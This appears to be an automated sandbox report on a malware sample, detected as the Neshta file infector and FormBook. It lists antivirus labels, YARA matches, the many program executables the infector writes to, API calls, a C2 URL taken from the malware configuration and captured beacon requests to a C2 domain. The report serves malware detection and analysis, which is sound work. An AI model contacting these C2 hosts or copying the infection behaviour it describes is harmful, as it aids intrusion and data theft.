          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpackAvira: Label: W32/Neshta.A
          Source: 4.0.explorer.exe.1183f834.74.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: vi0EwpbUht.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Spreading:

          barindex
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Infects executable files (exe, dll, sys, html)Show sources
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,1_2_00405080
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,1_2_00405634
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404F6C FindFirstFileA,FindClose,1_2_00404F6C
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,1_2_0040F0C4
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,1_2_0040F0CC
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,1_2_0040F13F
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,1_2_004056A7
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EA04 FindFirstFileA,FindClose,1_2_0040EA04
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB16 FindFirstFileA,FindClose,1_2_0040EB16
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,1_2_0040EB18
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00405302
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,2_2_00405CD8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_0040263E FindFirstFileA,2_2_0040263E
          Source: C:\Windows\svchost.comCode function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,5_2_00405634
          Source: C:\Windows\svchost.comCode function: 5_2_00404F6C FindFirstFileA,FindClose,5_2_00404F6C
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,5_2_0040F0C4
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,5_2_0040F0CC
          Source: C:\Windows\svchost.comCode function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,5_2_00405080
          Source: C:\Windows\svchost.comCode function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,5_2_0040F13F
          Source: C:\Windows\svchost.comCode function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,5_2_004056A7
          Source: C:\Windows\svchost.comCode function: 5_2_0040EA04 FindFirstFileA,FindClose,5_2_0040EA04
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB16 FindFirstFileA,FindClose,5_2_0040EB16
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,5_2_0040EB18
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,1_2_00406D40
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Jump to behavior

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.personalizedyardsigns.com/xkcp/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1Host: www.agileintelligence.coachConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1Host: www.agileintelligence.coachConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.agileintelligence.coach
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: vi0EwpbUht.exe, vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00404EB9
          Source: vi0EwpbUht.exe, 00000001.00000003.460371414.0000000002390000.00000004.00000001.sdmpBinary or memory string: _WinAPI_RegisterRawInputDevices.au3

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
